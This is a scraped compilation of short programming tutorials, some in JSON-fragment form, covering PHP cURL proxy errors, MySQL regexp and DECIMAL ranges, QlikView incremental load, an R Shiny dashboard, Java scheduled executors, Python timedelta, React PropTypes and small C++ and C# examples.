null, "e": 26763, "s": 26547, "text": "In the above code, we connected to a proxy that needs authentication before sending an easy GET request. If the proxy doesn’t require authentication, then you could omit the CURLOPT_PROXYUSERPWD line from your code." }, { "code": null, "e": 26813, "s": 26763, "text": "Some errors you might encounter while using curl:" }, { "code": null, "e": 27045, "s": 26813, "text": "“Failed to attach to 11.22.33.44 port 1234: Timed out” This means that cURL couldn’t hook up with the proxy IP address and port used. Make sure that both the IP and port are correct and also check if the proxy is working correctly." }, { "code": null, "e": 27389, "s": 27045, "text": "“Failed to attach to 11.22.33.44 port 1234: Connection refused” This error usually occurs once you have specified an incorrect port number i.e. the IP address of the proxy was correct, but it’s not listening for requests on specified port. There is also the likelihood that the server is up, but the software that runs the proxy isn’t running." 
}, { "code": null, "e": 27655, "s": 27389, "text": "“Received HTTP code 407 from proxy after CONNECT” The username and password combo that you simply are using with CURLOPT_PROXYUSERPWD is wrong. Make sure that username and password are correct and you are separating the username and password by a colon : character." }, { "code": null, "e": 27664, "s": 27655, "text": "PHP-Misc" }, { "code": null, "e": 27668, "s": 27664, "text": "PHP" }, { "code": null, "e": 27681, "s": 27668, "text": "PHP Programs" }, { "code": null, "e": 27698, "s": 27681, "text": "Web Technologies" }, { "code": null, "e": 27725, "s": 27698, "text": "Web technologies Questions" }, { "code": null, "e": 27729, "s": 27725, "text": "PHP" }, { "code": null, "e": 27827, "s": 27729, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27836, "s": 27827, "text": "Comments" }, { "code": null, "e": 27849, "s": 27836, "text": "Old Comments" }, { "code": null, "e": 27931, "s": 27849, "text": "How to fetch data from localserver database and display on HTML table using PHP ?" }, { "code": null, "e": 27982, "s": 27931, "text": "Different ways for passing data to view in Laravel" }, { "code": null, "e": 28024, "s": 27982, "text": "How to create admin login page using PHP?" }, { "code": null, "e": 28098, "s": 28024, "text": "Create a drop-down list that options fetched from a MySQL database in PHP" }, { "code": null, "e": 28162, "s": 28098, "text": "How to pass form variables from one page to other page in PHP ?" }, { "code": null, "e": 28214, "s": 28162, "text": "How to call PHP function on the click of a Button ?" }, { "code": null, "e": 28296, "s": 28214, "text": "How to fetch data from localserver database and display on HTML table using PHP ?" }, { "code": null, "e": 28338, "s": 28296, "text": "How to create admin login page using PHP?" }, { "code": null, "e": 28397, "s": 28338, "text": "How to calculate the difference between two dates in PHP ?" } ]
How to check the column values have string or digits in MySQL?
If you want only the string values, then use the below syntax −

select *from yourTableName where yourColumnName NOT regexp '^[0-9]+$';

If you want only the digits, then use the below syntax −

select *from yourTableName where yourColumnName regexp '^[0-9]+$';

Here, the pattern '^[0-9]+$' matches values that consist of digits from start (^) to end ($). Let us first create a table −

mysql> create table DemoTable(
   Id varchar(100)
);
Query OK, 0 rows affected (0.49 sec)

Insert some records in the table using insert command −

mysql> insert into DemoTable values('1000');
Query OK, 1 row affected (0.16 sec)
mysql> insert into DemoTable values('John');
Query OK, 1 row affected (0.10 sec)
mysql> insert into DemoTable values('Carol_Smith');
Query OK, 1 row affected (0.15 sec)
mysql> insert into DemoTable values('2000');
Query OK, 1 row affected (0.10 sec)

Display all records from the table using select statement −

mysql> select *from DemoTable;

This will produce the following output −

+-------------+
| Id          |
+-------------+
| 1000        |
| John        |
| Carol_Smith |
| 2000        |
+-------------+
4 rows in set (0.00 sec)

CASE 1 − Following is the query to get only the string values −

mysql> select *from DemoTable where Id NOT regexp '^[0-9]+$';

This will produce the following output displaying only the string column values −

+-------------+
| Id          |
+-------------+
| John        |
| Carol_Smith |
+-------------+
2 rows in set (0.00 sec)

CASE 2 − Following is the query to get only the digits −

mysql> select *from DemoTable where Id regexp '^[0-9]+$';

This will produce the following output displaying only the digit column values −

+------+
| Id   |
+------+
| 1000 |
| 2000 |
+------+
2 rows in set (0.00 sec)
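Note that because '^[0-9]+$' is anchored, it matches only values made up entirely of digits. If you instead want every row whose value contains at least one digit anywhere, drop the anchors. An illustrative query against the same table −

mysql> select *from DemoTable where Id regexp '[0-9]';

With the sample data above, this returns the same two rows (1000 and 2000), since no mixed values are present, but it would additionally match a mixed value such as 'abc123'.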
[ { "code": null, "e": 1126, "s": 1062, "text": "If you want only the string values, then use the below syntax −" }, { "code": null, "e": 1197, "s": 1126, "text": "select *from yourTableName where yourColumnName NOT regexp '^[0-9]+$';" }, { "code": null, "e": 1253, "s": 1197, "text": "If you want only the digit, then use the below syntax −" }, { "code": null, "e": 1320, "s": 1253, "text": "select *from yourTableName where yourColumnName regexp '^[0-9]+$';" }, { "code": null, "e": 1350, "s": 1320, "text": "Let us first create a table −" }, { "code": null, "e": 1440, "s": 1350, "text": "mysql> create table DemoTable(\n Id varchar(100)\n);\nQuery OK, 0 rows affected (0.49 sec)" }, { "code": null, "e": 1496, "s": 1440, "text": "Insert some records in the table using insert command −" }, { "code": null, "e": 1827, "s": 1496, "text": "mysql> insert into DemoTable values('1000');\nQuery OK, 1 row affected (0.16 sec)\nmysql> insert into DemoTable values('John');\nQuery OK, 1 row affected (0.10 sec)\nmysql> insert into DemoTable values('Carol_Smith');\nQuery OK, 1 row affected (0.15 sec)\nmysql> insert into DemoTable values('2000');\nQuery OK, 1 row affected (0.10 sec)" }, { "code": null, "e": 1887, "s": 1827, "text": "Display all records from the table using select statement −" }, { "code": null, "e": 1918, "s": 1887, "text": "mysql> select *from DemoTable;" }, { "code": null, "e": 1959, "s": 1918, "text": "This will produce the following output −" }, { "code": null, "e": 2112, "s": 1959, "text": "+-------------+\n| Id |\n+-------------+\n| 1000 |\n| John |\n| Carol_Smith |\n| 2000 |\n+-------------+\n4 rows in set (0.00 sec)" }, { "code": null, "e": 2175, "s": 2112, "text": "CASE 1 − Following is the query to get only the string value −" }, { "code": null, "e": 2237, "s": 2175, "text": "mysql> select *from DemoTable where Id NOT regexp '^[0-9]+$';" }, { "code": null, "e": 2319, "s": 2237, "text": "This will produce the following output displaying only the string column values −" }, { "code": null, "e": 2440, "s": 2319, "text": "+-------------+\n| Id |\n+-------------+\n| John |\n| Carol_Smith |\n+-------------+\n2 rows in set (0.00 sec)" }, { "code": null, "e": 2497, "s": 2440, "text": "CASE 2 − Following is the query to get only the digits −" }, { "code": null, "e": 2555, "s": 2497, "text": "mysql> select *from DemoTable where Id regexp '^[0-9]+$';" }, { "code": null, "e": 2636, "s": 2555, "text": "This will produce the following output displaying only the digit column values −" }, { "code": null, "e": 2715, "s": 2636, "text": "+------+\n| Id |\n+------+\n| 1000 |\n| 2000 |\n+------+\n2 rows in set (0.00 sec)" } ]
C++ program to print Happy Birthday
This is a C++ program to print Happy Birthday.

Begin
   Take a string str in which each character is the one before the corresponding character of the desired output (for 'H' it stores 'G').
   Assign the string to a pointer p.
   Loop while *p != '\0'.
   At each step, increment the character p points to (shifting it forward by one) and then advance p to the next position.
   Print the resulting string.
End

#include<iostream>
using namespace std;
int main() {
   // Each character is one less than the intended output character
   char str[] = "G`ooxAhqsgc`x", *p;
   p = str;
   while (*p != '\0')
      ++*p++;   // increment the character p points to, then advance p
   cout << str;
}

This will produce the following output −

HappyBirthday
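To see where the odd-looking literal comes from, here is a small Python sketch, not part of the original program, that derives the encoded string by shifting every character of "HappyBirthday" back by one code point, and then undoes the shift the same way ++*p++ does:

message = "HappyBirthday"

# Shift every character back by one to produce the obfuscated source string
encoded = "".join(chr(ord(c) - 1) for c in message)
print(encoded)   # G`ooxAhqsgc`x

# Shifting forward by one recovers the original message
decoded = "".join(chr(ord(c) + 1) for c in encoded)
print(decoded)   # HappyBirthday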
QlikView - Incremental Load
As the volume of data in the data source of a QlikView document increases, the time taken to load the file also increases, which slows down the process of analysis. One approach to minimize this load time is to load only the records that are new in the source or have been updated. This concept of loading only the new or changed records from the source into the QlikView document is called Incremental Load.

To identify the new records in the source, we use either a sequential unique key or a date-time stamp for each row. The value of this unique key or date-time field has to flow from the source file to the QlikView document.

Let us consider the following source file containing product details in a retail store. Save this as a .csv file in the local system where it is accessible by QlikView. Over a period of time, some more products are added and the description of some products changes.

Product_Id,Product_Line,Product_category,Product_Subcategory
1,Sporting Goods,Outdoor Recreation,Winter Sports & Activities
2,"Food, Beverages & Tobacco",Food Items,Fruits & Vegetables
3,Apparel & Accessories,Clothing,Uniforms
4,Sporting Goods,Athletics,Rugby
5,Health & Beauty,Personal Care
6,Arts & Entertainment,Hobbies & Creative Arts,Musical Instruments
7,Arts & Entertainment,Hobbies & Creative Arts,Orchestra Accessories
8,Arts & Entertainment,Hobbies & Creative Arts,Crafting Materials
9,Hardware,Tool Accessories,Power Tool Batteries
10,Home & Garden,Bathroom Accessories,Bath Caddies
11,"Food, Beverages & Tobacco",Food Items,Frozen Vegetables
12,Home & Garden,Lawn & Garden,Power Equipment

We will load the above CSV file using the script editor (Control+E) by choosing the Table Files option as shown below. Here we also save the data into a QVD file in the local system. Save the QlikView document as a .qvw file.

We can check the data loaded into the QlikView document by creating a sheet object called Table Box. This is available in the Layout menu, under the New Sheet Objects sub-menu.

On selecting the Table Box sheet object, we get to the next screen, which is used to select the columns and their positions in the table to be created. We choose the following columns and their positions and click Finish.

The following chart, showing the data as laid out in the previous step, appears.

Let us add the following three more records to the source data. Here, the Product IDs are unique numbers which identify the new records.

13,Office Supplies,Presentation Supplies,Display
14,Hardware,Tool Accessories,Jigs
15,Baby & Toddler,Diapering,Baby Wipes

Now, we write the script to pull only the new records from the source.

// Load the data from the stored qvd.
Stored_Products:
LOAD Product_Id,
     Product_Line,
     Product_category,
     Product_Subcategory
FROM [E:\Qlikview\data\products.qvd] (qvd);

// Select the maximum value of Product ID.
Max_Product_ID:
Load max(Product_Id) as MaxId
resident Stored_Products;

// Store the maximum value of Product Id in a variable.
Let MaxId = peek('MaxId', -1);

drop table Stored_Products;

// Pull the rows that are new.
NewProducts:
LOAD Product_Id, Product_Line, Product_category, Product_Subcategory
from [E:\Qlikview\data\product_categories.csv]
(txt, codepage is 1252, embedded labels, delimiter is ',', msq)
where Product_Id > $(MaxId);

// Concatenate the new values with the existing qvd.
Concatenate
LOAD Product_Id, Product_Line, Product_category, Product_Subcategory
FROM [E:\Qlikview\data\products.qvd] (qvd);

// Store the values in the qvd.
store NewProducts into [E:\Qlikview\data\products.qvd] (qvd);

The above script fetches only the new records, appends them to the previously stored data, and stores the combined result back into the QVD file, which now also contains the records with the new Product IDs 13, 14 and 15.
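The same pattern, remembering the highest key already stored and then pulling only the rows above it, carries over to any tool. Here is a minimal, self-contained Python/pandas sketch of the idea; the small in-memory data frames stand in for the QVD and CSV files and are illustrative, not the article's actual data pipeline:

import pandas as pd

# Previously stored data (stands in for the products QVD)
stored = pd.DataFrame({
    "Product_Id": [1, 2, 3],
    "Product_Line": ["Sporting Goods", "Food, Beverages & Tobacco",
                     "Apparel & Accessories"],
})

# Full source extract, now containing new rows (stands in for the CSV)
source = pd.DataFrame({
    "Product_Id": [1, 2, 3, 4, 5],
    "Product_Line": ["Sporting Goods", "Food, Beverages & Tobacco",
                     "Apparel & Accessories", "Sporting Goods",
                     "Health & Beauty"],
})

max_id = stored["Product_Id"].max()               # like peek('MaxId', -1)
new_rows = source[source["Product_Id"] > max_id]  # pull only the new records
combined = pd.concat([stored, new_rows], ignore_index=True)  # like Concatenate

print(combined)   # stored rows plus only the new ones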
A Complete Dashboard Project in R Shiny App | by Lasha Gochiashvili | Towards Data Science
To get a taste of what we will build in this guide, you can take a look at the live dashboard: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/

Now, one can ask why R and Shiny App? I would answer: because it is free, scalable, and easy to learn, supported by a generous and enthusiastic community, and it's pretty.

The full codes of the dashboard project are on Github.

In this guide we will cover:

Data sources
Data transformation
Shiny App structure
Visualizations
Deployment of the dashboard on the https://www.shinyapps.io/ web server.

Our motivation is that the dashboard will help young people of Singapore, and those seeking study opportunities in Singapore, to analyze which university and degree has a better outcome with regards to employment and income.

Let's get started!

We will use two datasets in this project.

Graduate employment survey dataset can be found here: data.gov.sg/ges

The number of graduates by university dataset can be found here: data.gov.sg/gra

As mentioned, the main metrics of the analysis are:

Employment Rate
Monthly Gross Income

We will use the following R packages (see the project repository for the full list).

The standard workflow for the data transformation looks like this: in the codes provided on GitHub (DataWrangling.R), we will basically attach the dataset, clean NAs, fill missing values, change the university names to make them more intuitive, and finally save the data frames in .rds format, which is much faster to read in the next steps.

If you inspect the school names with unique(data_e$school), you will find some names that need cleaning.

Transforming factor variables into numeric:

data_e <- data_e %>% modify_at(c(5:12), as.numeric)

And finally, saving the cleaned data frame with the .rds extension for Shiny:

saveRDS(data_e, file = "data/employment_data.rds")

To run a Shiny App you need to install the package and import the library:

install.packages("shiny")
library(shiny)

Shiny applications have two important components; I call them the front-end, ui.R, and the back-end, server.R.

In ui.R we create the structure of the front-end: how we want our web application to look.

This is the basic diagram of the ui for our dashboard.

Now, let's run the first example of ui.R and its corresponding server.R codes.

We have the front-end; now we need the corresponding back-end. In the ui code we declared a table output "datahead" and a plot output "piePlot", so let's configure server.R to render them.

After running the ui.R or server.R code, the result is below.

The full codes are on GitHub for ui.R and server.R. You will need to have ui.R and server.R in the same folder, in separate R files. When you run one of the R files, the Shiny App will open.

Visualizations are mostly done in Plotly, and the data tables are presented with kable. I recommend checking some examples on the internet because they are so fancy! Here are useful links for Plotly interactive graphs and kable awesome tables.

From the project, I will post some examples here.

Plotly

Let's dive deeper into the details of the National University of Singapore and list the basic monthly median income for each school. Code example:

Result:

And we can see from the plot that graduates from the College of Law earn the most :).

Kable

To show the pretty and interactive table of kable, let's see the full table of Fulltime Employment and Basic Monthly Salary (Median) by Universities, their Schools, and Degrees in 2018. Code example:

And the results:

To publish your Shiny App online, you should sign up on www.shinyapps.io; it is free to run up to three applications.

Please read this guide, as it explains in detail what you need to do to create a connection between your app and the shinyapps.io server.

A few steps are here:

0. I assume you have ui.R and server.R in the same folder.

1. Run this code in your R file:

install.packages('rsconnect')
library(rsconnect)

2. Create a shinyapps.io account. Please note that shinyapps.io will use your account name as the domain name for all your apps.

3. When you log in to shinyapps.io, get the token that is generated on the website.

4. Configure the rsconnect package to use your account. Citing the website: "Click the show button on the token page. A window will pop up that shows the full command to configure your account using the appropriate parameters for the rsconnect::setAccountInfo function. Copy this command to your clipboard, and then paste it into the command line of RStudio and click enter."

5. Publish your app. To deploy your application, use the code below:

library(rsconnect)
deployApp()

Then click the Publish button in R (from ui.R or server.R).

Once the deployment finishes: voilà! Congratulations! Your first Shiny App is published. If you make changes in the ui.R or server.R files, you can republish the app.

In this step-by-step guide, I showed you how to build this web dashboard in a Shiny App: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/. We reviewed data sources, data transformation, the Shiny App structure, the visualizations used in the project, and the deployment steps. Feel free to access and use the codes. Downloading and running them should give you the same results. Full codes are here. If you run into issues, feel free to drop me a message ;)

Special thanks to Dr. Piotr Wójcik and Mgr. Piotr Ćwiakowski, our teachers in Advanced R at the University of Warsaw, and to my colleague Zimin Luo, with whom I worked on this project during Graduate Studies in Data Science at the University of Warsaw.
ScheduledExecutorService Interface
A java.util.concurrent.ScheduledExecutorService interface is a sub-interface of the ExecutorService interface that supports delayed and/or periodic execution of tasks.

<V> ScheduledFuture<V> schedule(Callable<V> callable, long delay, TimeUnit unit)
Creates and executes a ScheduledFuture that becomes enabled after the given delay.

ScheduledFuture<?> schedule(Runnable command, long delay, TimeUnit unit)
Creates and executes a one-shot action that becomes enabled after the given delay.

ScheduledFuture<?> scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit)
Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given period; that is, executions will commence after initialDelay, then initialDelay + period, then initialDelay + 2 * period, and so on.

ScheduledFuture<?> scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit)
Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given delay between the termination of one execution and the commencement of the next.

The following TestThread program shows the usage of the ScheduledExecutorService interface in a thread-based environment. It schedules a beeping task to run every two seconds and cancels it after ten seconds.

import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.TimeUnit;

public class TestThread {

   public static void main(final String[] arguments) throws InterruptedException {
      final ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(1);

      // Beep every 2 seconds, starting after an initial delay of 2 seconds
      final ScheduledFuture<?> beepHandler =
         scheduler.scheduleAtFixedRate(new BeepTask(), 2, 2, TimeUnit.SECONDS);

      // After 10 seconds, cancel the beeping task and shut the scheduler down
      scheduler.schedule(new Runnable() {

         @Override
         public void run() {
            beepHandler.cancel(true);
            scheduler.shutdown();
         }
      }, 10, TimeUnit.SECONDS);
   }

   static class BeepTask implements Runnable {

      public void run() {
         System.out.println("beep");
      }
   }
}

This will produce the following result.

beep
beep
beep
beep
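For comparison only, and not part of the Java API, here is a rough Python sketch of the same fixed-rate schedule-and-cancel pattern. The schedule_at_fixed_rate helper and the Event-based cancellation are hypothetical constructs written for this illustration; note how scheduling the next run from the previous start time (rather than sleeping a fixed period after each run) is what distinguishes fixed-rate from fixed-delay execution:

import threading
import time

def schedule_at_fixed_rate(task, initial_delay, period, stop_event):
    """Runs task at initial_delay, initial_delay + period, ... until cancelled."""
    def runner():
        next_run = time.monotonic() + initial_delay
        # Event.wait returns True once the event is set (i.e. cancelled)
        while not stop_event.wait(max(0, next_run - time.monotonic())):
            task()
            next_run += period  # fixed rate: schedule from the previous start
    threading.Thread(target=runner, daemon=True).start()

stop = threading.Event()                        # plays the role of the ScheduledFuture
schedule_at_fixed_rate(lambda: print("beep"), 2, 2, stop)

time.sleep(10)   # let it beep for about ten seconds
stop.set()       # analogous to beepHandler.cancel(true)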
How to add and subtract days using DateTime in Python? - GeeksforGeeks
23 Apr, 2021

Programs often have to keep track of dates and times, so it is useful to have a module for manipulating them. In Python, the datetime module, which is built into the standard library, deals with dates and times.

The datetime module consists of the following classes:

Name        Description
date        A naive date: year, month and day.
time        A time of day, independent of any particular day.
datetime    A combination of a date and a time.
timedelta   A duration: the difference between two dates, times or datetimes.
tzinfo      An abstract base class for time zone information.
timezone    A concrete tzinfo subclass representing a fixed offset from UTC.

For adding or subtracting days from a date, we use the timedelta class, which can be found in the datetime module. It is used to manipulate dates: we can perform arithmetic operations on a date, like adding to it or subtracting from it. timedelta is very easy and useful to use.

Syntax: class datetime.timedelta(days=0, seconds=0, microseconds=0, milliseconds=0, minutes=0, hours=0, weeks=0)

Returns: a timedelta object; adding it to (or subtracting it from) a date or datetime returns a new date or datetime.

Note: if we don't name the argument, a bare value is taken as a number of days.

Example 1. Adding days

Python3

# MANIPULATING DATETIME
from datetime import date, timedelta

today_date = date.today()

print("CURRENT DAY : ", today_date)

# as said earlier, a bare argument is taken as days by default
td = timedelta(5)
print("AFTER 5 DAYS DATE WILL BE : ", today_date + td)

Output:

CURRENT DAY : 2020-12-27
AFTER 5 DAYS DATE WILL BE : 2021-01-01

Example 2. Subtracting days

Python3

# MANIPULATING DATETIME
from datetime import date, timedelta

current_date = date.today()

print("CURRENT DAY : ", current_date)

print("OLD Date : ", current_date - timedelta(17))

Output:

CURRENT DAY : 2020-12-27
OLD Date : 2020-12-10

As in the above code, I have created a variable called current_date which holds the current date, and then printed that current date. After that, I have used the timedelta function and passed in a value for how many days to add or subtract (this value can be any integer).

Similarly, we can do the same with times also.

Example 3:

Python3

# MANIPULATING DATETIME
from datetime import datetime, timedelta

current = datetime.now()
print("This is the current date and time :- ", current)

# FOR PRINTING TOMORROW'S DATE
tomorrow = timedelta(1)
print("Tomorrow's date and time :- ", current + tomorrow)

# FOR PRINTING YESTERDAY'S DATE
yesterday = timedelta(-1)
print("Yesterday's date and time :- ", current + yesterday)

Output:

This is the current date and time :- 2020-12-27 13:50:14.229336
Tomorrow's date and time :- 2020-12-28 13:50:14.229336
Yesterday's date and time :- 2020-12-26 13:50:14.229336

Example 4:

Python3

# MANIPULATING DATETIME
from datetime import datetime, timedelta

curr = datetime.now()
print("Current Date and time :- ", curr)

new_datetime = timedelta(days = 10, seconds = 40, microseconds = 10,
                         milliseconds = 60, minutes = 10, hours = 4, weeks = 8)

print("New Date and time :- ", curr + new_datetime)

Output:

Current Date and time :- 2020-12-27 13:58:42.178211
New Date and time :- 2021-03-03 18:09:22.238221
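Subtraction also works between two dates, not just between a date and a timedelta, and this is often how day arithmetic shows up in practice. One more short sketch; the dates here are made up purely for illustration:

Python3

from datetime import date, timedelta

# Hypothetical dates, chosen only for this example
deadline = date(2021, 5, 1)
today = date(2021, 4, 23)

# Subtracting two dates yields a timedelta, whose .days gives the gap
remaining = deadline - today
print("Days left:", remaining.days)                        # Days left: 8

# timedelta also accepts weeks, hours, minutes, and so on
print("One week earlier:", deadline - timedelta(weeks=1))  # 2021-04-24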
ReactJS - Props Validation
Properties validation is a useful way to force the correct usage of components. It helps during development to avoid future bugs and problems once the app becomes larger, and it also makes the code more readable, since we can see how each component should be used.

In this example, we are creating an App component with all the props that we need. App.propTypes is used for props validation. If some of the props don't use the correct type that we assigned, we will get a console warning. After we specify the validation patterns, we set App.defaultProps. (Note that React.PropTypes as shown here was removed from the React core in React 16; in newer projects the same validators come from the standalone prop-types package, imported as: import PropTypes from 'prop-types'.)

import React from 'react';

class App extends React.Component {
   render() {
      return (
         <div>
            <h3>Array: {this.props.propArray}</h3>
            <h3>Bool: {this.props.propBool ? "True..." : "False..."}</h3>
            <h3>Func: {this.props.propFunc(3)}</h3>
            <h3>Number: {this.props.propNumber}</h3>
            <h3>String: {this.props.propString}</h3>
            <h3>Object: {this.props.propObject.objectName1}</h3>
            <h3>Object: {this.props.propObject.objectName2}</h3>
            <h3>Object: {this.props.propObject.objectName3}</h3>
         </div>
      );
   }
}

App.propTypes = {
   propArray: React.PropTypes.array.isRequired,
   propBool: React.PropTypes.bool.isRequired,
   propFunc: React.PropTypes.func,
   propNumber: React.PropTypes.number,
   propString: React.PropTypes.string,
   propObject: React.PropTypes.object
}

App.defaultProps = {
   propArray: [1,2,3,4,5],
   propBool: true,
   propFunc: function(e){return e},
   propNumber: 1,
   propString: "String value...",

   propObject: {
      objectName1:"objectValue1",
      objectName2: "objectValue2",
      objectName3: "objectValue3"
   }
}
export default App;

The entry file then renders the component:

import React from 'react';
import ReactDOM from 'react-dom';
import App from './App.jsx';

ReactDOM.render(<App/>, document.getElementById('app'));
Random Numbers in C#
To generate random numbers in C#, use the Next(minValue, maxValue) method of the Random class. The parameters set the range: minValue is the inclusive lower bound and maxValue is the exclusive upper bound, so the call below returns a value from 100 to 199.

Next(100,200);

We call the above method on a Random() object.

Random rd = new Random();
int rand_num = rd.Next(100,200);

The following is an example −

using System;
class Program {
   static void Main() {
      Random rd = new Random();

      // Returns a pseudo-random integer in [100, 200)
      int rand_num = rd.Next(100,200);

      Console.WriteLine(rand_num);
   }
}

This will produce output similar to the following (the value varies from run to run) −

182
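As a point of comparison only, and not part of the C# program, the same half-open range convention exists in Python's random module; this short sketch shows the equivalent calls and makes the inclusive/exclusive distinction explicit:

import random

# Same semantics as C#'s rd.Next(100, 200): lower bound inclusive, upper exclusive
print(random.randrange(100, 200))   # a value from 100 to 199

# randint, by contrast, includes both endpoints
print(random.randint(100, 199))     # also a value from 100 to 199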
What is the range of MySQL DECIMAL(x,0)?
The range of the DECIMAL data type is wider than that of the INTEGER and BIGINT data types. BIGINT can store at most 18446744073709551615, while DECIMAL allows up to DECIMAL(65,0), whose maximum value is a number made of 65 nines. DECIMAL values are stored in a packed binary format: nine decimal digits fit into four bytes, and any leftover digits take up to four more bytes. For DECIMAL(x,0) the storage requirement in bytes is:

StorageRequirementInBytes = floor(x / 9) * 4 + remaining;
WHERE remaining = round_up( (x % 9) / 2 )

The maximum value a DECIMAL(65,0) column can store is as follows −

99999999999999999999999999999999999999999999999999999999999999999

To understand what we discussed above, let us create a table. The query to create a table is as follows −

mysql> create table DecimalDemo
   -> (
   -> UserId DECIMAL(65,0)
   -> );
Query OK, 0 rows affected (0.62 sec)

Now you can insert some records in the table using the insert command. The query is as follows −

mysql> insert into DecimalDemo values(99999999999999999999999999999999999999999999999999999999999999999);
Query OK, 1 row affected (0.16 sec)
mysql> insert into DecimalDemo values(99999999999999999999999999999999999999999999999999999999999999999.0);
Query OK, 1 row affected (0.28 sec)

Display all records from the table using a select statement. The query is as follows −

mysql> select * from DecimalDemo;

+-------------------------------------------------------------------+
| UserId                                                            |
+-------------------------------------------------------------------+
| 99999999999999999999999999999999999999999999999999999999999999999 |
| 99999999999999999999999999999999999999999999999999999999999999999 |
+-------------------------------------------------------------------+
2 rows in set (0.00 sec)

If you try to specify a precision of 66 at the time of creating the table, you will get the following error −

mysql> create table DecimalDemo1
   -> (
   -> UserId DECIMAL(66,0)
   -> );
ERROR 1426 (42000): Too-big precision 66 specified for 'UserId'. Maximum is 65.
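To make the storage formula concrete, here is a small Python sketch; the function name is mine, not MySQL's, and it computes the byte cost of the integer part of a DECIMAL column (MySQL computes the fractional part separately with the same packing rule):

import math

def decimal_storage_bytes(precision: int, scale: int = 0) -> int:
    """Bytes needed for the integer part of a MySQL DECIMAL(precision, scale)."""
    digits = precision - scale                  # digits left of the decimal point
    full_groups, leftover = divmod(digits, 9)   # nine digits pack into four bytes
    return full_groups * 4 + math.ceil(leftover / 2)

print(decimal_storage_bytes(65))   # 29 bytes for DECIMAL(65,0): 7 * 4 + 1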